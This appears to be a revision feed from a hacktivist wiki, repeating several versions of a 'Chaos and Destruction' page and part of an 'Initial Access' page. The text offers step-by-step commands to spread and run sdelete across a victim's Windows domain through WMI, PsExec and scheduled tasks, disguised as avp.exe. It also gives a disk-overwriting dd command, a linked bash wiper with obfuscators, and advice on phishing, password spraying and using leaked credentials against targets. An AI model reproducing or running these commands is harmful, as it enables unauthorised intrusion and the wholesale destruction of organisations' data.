* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) &amp;lt;code&amp;gt;sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 2 - WMI ====&lt;br /&gt;
[https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak/blob/main/Manual_CS.txt Using batch files to spread] sdelete64.exe utilizing Windows Management Instrumentation (WMI)&lt;br /&gt;
&lt;br /&gt;
On the domain controller (DC) get a list of server names:&lt;br /&gt;
* &amp;lt;code&amp;gt;net view /all /domain&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Copy&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list:&lt;br /&gt;
* &amp;lt;code&amp;gt;for /f %%i in (servers.txt) do copy &amp;quot;C:\Windows\Temp\sdelete64.exe&amp;quot; &amp;quot;\\%%i\C$\Windows\avp.exe&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify account credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;start wmic /node:&amp;quot;&amp;lt;COMPUTER&amp;gt;&amp;quot; /user:&amp;quot;Administrator&amp;quot; /password:&amp;quot;Passw0rd123!&amp;quot; process call create &amp;quot;cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Execute&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Running as the domain admin now execute:&lt;br /&gt;
* &amp;lt;code&amp;gt;for /f %%i in (servers.txt) do wmic /node:%%i process call create &amp;quot;cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify account credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;start wmic /node:&amp;quot;&amp;lt;COMPUTER&amp;gt;&amp;quot; /user:&amp;quot;Administrator&amp;quot; /password:&amp;quot;Passw0rd123!&amp;quot; process call create &amp;quot;cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 3 - PsExec ====&lt;br /&gt;
Using [https://learn.microsoft.com/en-us/sysinternals/downloads/psexec PsExec] to run sdelete64.exe [https://youtu.be/oMAvSpq9fYY?feature=shared&amp;amp;t=2811 across the network]:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Copy:&#039;&#039;&#039;&lt;br /&gt;
* &amp;lt;code&amp;gt;PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy &amp;quot;\\127.0.0.1\C$\Windows\Temp\sdelete64.exe&amp;quot; &amp;quot;C:\Windows&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Execute:&#039;&#039;&#039;&lt;br /&gt;
* &amp;lt;code&amp;gt;start PsExec.exe -d @:\\127.0.0.1\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 4 - Schtasks ====&lt;br /&gt;
Using [https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks Windows scheduled tasks] to execute sdelete64.exe on remote systems (also good for lateral movement):&lt;br /&gt;
&lt;br /&gt;
Run as domain admin:&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /run /tn wipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /u Administrator /p Passw0rd123! /run /tn wipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Windows Domain ===&lt;br /&gt;
[https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Encrypt Windows Domain] (1:24:16 Wiping windows domain with Bitlocker)&lt;br /&gt;
* https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons&lt;br /&gt;
&lt;br /&gt;
== Linux ==&lt;br /&gt;
=== Print your manifesto ===&lt;br /&gt;
* &amp;lt;code&amp;gt;find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;&amp;lt;/code&amp;gt;&lt;br /&gt;
=== Wiping Linux System ===&lt;br /&gt;
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a [https://0xjet.github.io/3OHA/2022/12/18/post.html bash wiper] to destroy those servers whilst sdelete64.exe is destroying the Windows systems.&lt;br /&gt;
* Bash Wiper: https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr ([https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip source])&lt;br /&gt;
** A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate&lt;br /&gt;
** Shell script compiler: https://packages.debian.org/bullseye/shc&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Chaos_and_Destruction&amp;diff=1727</id>
		<title>Chaos and Destruction</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Chaos_and_Destruction&amp;diff=1727"/>
		<updated>2024-03-25T17:53:05Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in [https://enlacehacktivista.org/hackback.webm Guacamaya&#039;s HackBack] video, we want to destroy data, not harm human life.&lt;br /&gt;
&lt;br /&gt;
== Windows ==&lt;br /&gt;
=== Print your manifesto ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
@echo off&lt;br /&gt;
set &amp;quot;manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt&amp;quot;&lt;br /&gt;
for /r &amp;quot;C:\&amp;quot; %%d in (.) do (&lt;br /&gt;
    xcopy &amp;quot;%manifesto%&amp;quot; &amp;quot;%%d\&amp;quot; /Y&lt;br /&gt;
)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Wiping Windows Domain ===&lt;br /&gt;
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Hack Back video Guacamaya made] it&#039;s best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it&#039;s a Microsoft developed and signed application removing the need to disable security controls before it&#039;s spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target.&lt;br /&gt;
&lt;br /&gt;
==== Method 1 - GPO &amp;amp; Schtasks ====&lt;br /&gt;
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain&lt;br /&gt;
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) &amp;lt;code&amp;gt;sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 2 - WMI ====&lt;br /&gt;
[https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak/blob/main/Manual_CS.txt Using batch files to spread] sdelete64.exe utilizing Windows Management Instrumentation (WMI)&lt;br /&gt;
&lt;br /&gt;
On the domain controller (DC) get a list of server names:&lt;br /&gt;
* &amp;lt;code&amp;gt;net view /all /domain&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Copy&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list:&lt;br /&gt;
* &amp;lt;code&amp;gt;for /f %%i in (servers.txt) do copy &amp;quot;C:\Windows\Temp\sdelete64.exe&amp;quot; &amp;quot;\\%%i\C$\Windows\avp.exe&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify account credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;start wmic /node:&amp;quot;&amp;lt;COMPUTER&amp;gt;&amp;quot; /user:&amp;quot;Administrator&amp;quot; /password:&amp;quot;Passw0rd123!&amp;quot; process call create &amp;quot;cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Execute&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Running as the domain admin now execute:&lt;br /&gt;
* &amp;lt;code&amp;gt;for /f %%i in (servers.txt) do wmic /node:%%i process call create &amp;quot;cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify account credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;start wmic /node:&amp;quot;&amp;lt;COMPUTER&amp;gt;&amp;quot; /user:&amp;quot;Administrator&amp;quot; /password:&amp;quot;Passw0rd123!&amp;quot; process call create &amp;quot;cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 3 - PsExec ====&lt;br /&gt;
Using [https://learn.microsoft.com/en-us/sysinternals/downloads/psexec PsExec] to run sdelete64.exe [https://youtu.be/oMAvSpq9fYY?feature=shared&amp;amp;t=2811 across the network]:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Copy:&#039;&#039;&#039;&lt;br /&gt;
* &amp;lt;code&amp;gt;PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy &amp;quot;\\127.0.0.1\C$\Windows\Temp\sdelete64.exe&amp;quot; &amp;quot;C:\Windows&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Execute:&#039;&#039;&#039;&lt;br /&gt;
* &amp;lt;code&amp;gt;start PsExec.exe -d @:\\127.0.0.1\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 4 - Schtasks ====&lt;br /&gt;
Using [https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks Windows scheduled tasks] to execute sdelete64.exe on remote systems (also good for lateral movement):&lt;br /&gt;
&lt;br /&gt;
Run as domain admin:&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /run /tn wipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /u Administrator /p Passw0rd123! /run /tn wipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Windows Domain ===&lt;br /&gt;
[https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Encrypt Windows Domain] (1:24:16 Wiping windows domain with Bitlocker)&lt;br /&gt;
* https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons&lt;br /&gt;
&lt;br /&gt;
== Linux ==&lt;br /&gt;
=== Print your manifesto ===&lt;br /&gt;
* &amp;lt;code&amp;gt;find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;&amp;lt;/code&amp;gt;&lt;br /&gt;
=== Wiping Linux System ===&lt;br /&gt;
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a [https://0xjet.github.io/3OHA/2022/12/18/post.html bash wiper] to destroy those servers whilst sdelete64.exe is destroying the Windows systems.&lt;br /&gt;
* https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr ([https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip source])&lt;br /&gt;
** A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate&lt;br /&gt;
** Shell script compiler: https://packages.debian.org/bullseye/shc&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Chaos_and_Destruction&amp;diff=1726</id>
		<title>Chaos and Destruction</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Chaos_and_Destruction&amp;diff=1726"/>
		<updated>2024-03-25T17:46:20Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in [https://enlacehacktivista.org/hackback.webm Guacamaya&#039;s HackBack] video, we want to destroy data, not harm human life.&lt;br /&gt;
&lt;br /&gt;
== Windows ==&lt;br /&gt;
=== Print your manifesto ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
@echo off&lt;br /&gt;
set &amp;quot;manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt&amp;quot;&lt;br /&gt;
for /r &amp;quot;C:\&amp;quot; %%d in (.) do (&lt;br /&gt;
    xcopy &amp;quot;%manifesto%&amp;quot; &amp;quot;%%d\&amp;quot; /Y&lt;br /&gt;
)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Wiping Windows Domain ===&lt;br /&gt;
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Hack Back video Guacamaya made] it&#039;s best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it&#039;s a Microsoft developed and signed application removing the need to disable security controls before it&#039;s spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target.&lt;br /&gt;
&lt;br /&gt;
==== Method 1 - GPO &amp;amp; Schtasks ====&lt;br /&gt;
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain&lt;br /&gt;
* [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) &amp;lt;code&amp;gt;sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 2 - WMI ====&lt;br /&gt;
[https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak/blob/main/Manual_CS.txt Using batch files to spread] sdelete64.exe utilizing Windows Management Instrumentation (WMI)&lt;br /&gt;
&lt;br /&gt;
On the domain controller (DC) get a list of server names:&lt;br /&gt;
* &amp;lt;code&amp;gt;net view /all /domain&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Copy&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Running as the domain admin, on the domain controller (DC), copy the sdelete64.exe binary file to all servers in your list:&lt;br /&gt;
* &amp;lt;code&amp;gt;for /f %%i in (servers.txt) do copy &amp;quot;C:\Windows\Temp\sdelete64.exe&amp;quot; &amp;quot;\\%%i\C$\Windows\avp.exe&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify account credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;start wmic /node:&amp;quot;&amp;lt;COMPUTER&amp;gt;&amp;quot; /user:&amp;quot;Administrator&amp;quot; /password:&amp;quot;Passw0rd123!&amp;quot; process call create &amp;quot;cmd.exe /c copy \\SHARE\C$\Windows\Temp\sdelete64.exe C:\Windows\avp.exe&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Execute&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Running as the domain admin now execute:&lt;br /&gt;
* &amp;lt;code&amp;gt;for /f %%i in (servers.txt) do wmic /node:%%i process call create &amp;quot;cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify account credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;start wmic /node:&amp;quot;&amp;lt;COMPUTER&amp;gt;&amp;quot; /user:&amp;quot;Administrator&amp;quot; /password:&amp;quot;Passw0rd123!&amp;quot; process call create &amp;quot;cmd.exe /c C:\Windows\avp.exe -accepteula -r -s C:\*&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 3 - PsExec ====&lt;br /&gt;
Using [https://learn.microsoft.com/en-us/sysinternals/downloads/psexec PsExec] to run sdelete64.exe [https://youtu.be/oMAvSpq9fYY?feature=shared&amp;amp;t=2811 across the network]:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Copy:&#039;&#039;&#039;&lt;br /&gt;
* &amp;lt;code&amp;gt;PsExec.exe -accepteula @C:\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c copy &amp;quot;\\127.0.0.1\C$\Windows\Temp\sdelete64.exe&amp;quot; &amp;quot;C:\Windows&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Execute:&#039;&#039;&#039;&lt;br /&gt;
* &amp;lt;code&amp;gt;start PsExec.exe -d @:\\127.0.0.1\C$\Windows\Temp\servers.txt -u DOMAIN\Administrator -p Passw0rd123! cmd /c C:\Windows\sdelete64.exe -accepteula -r -s C:\*&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Method 4 - Schtasks ====&lt;br /&gt;
Using [https://learn.microsoft.com/en-us/windows/win32/taskschd/schtasks Windows scheduled tasks] to execute sdelete64.exe on remote systems (also good for lateral movement):&lt;br /&gt;
&lt;br /&gt;
Run as domain admin:&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /run /tn wipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Specify credentials:&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /u Administrator /p Passw0rd123! /Create /tn wipe /tr C:\Windows\avp.exe -accepteula -r -s C:\* /ru SYSTEM /sc once /st 00:00&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;schtasks /s &amp;lt;COMPUTER&amp;gt; /u Administrator /p Passw0rd123! /run /tn wipe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Windows Domain ===&lt;br /&gt;
[https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Encrypt Windows Domain] (1:24:16 Wiping windows domain with Bitlocker)&lt;br /&gt;
* https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons&lt;br /&gt;
&lt;br /&gt;
== Linux ==&lt;br /&gt;
=== Print your manifesto ===&lt;br /&gt;
* &amp;lt;code&amp;gt;find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;&amp;lt;/code&amp;gt;&lt;br /&gt;
=== Wiping Linux System ===&lt;br /&gt;
After you have identified all of your targets internal Linux servers and are able to access them, you can utilize a [https://0xjet.github.io/3OHA/2022/12/18/post.html bash wiper] to destroy those servers whilst sdelete64.exe is destroying the Windows systems.&lt;br /&gt;
* https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr ([https://github.com/0xjet/bash-malware/blob/main/AWFULSHRED/AWFULSHRED_beautified.zip source])&lt;br /&gt;
** A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate&lt;br /&gt;
** Shell script compiler: https://packages.debian.org/bullseye/shc&lt;br /&gt;
&lt;br /&gt;
Complete obliteration:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo dd if=/dev/urandom of=/dev/sda bs=4M status=progress&amp;lt;/code&amp;gt;&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1725</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1725"/>
		<updated>2024-03-25T17:12:09Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Vulnerability Scanning */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
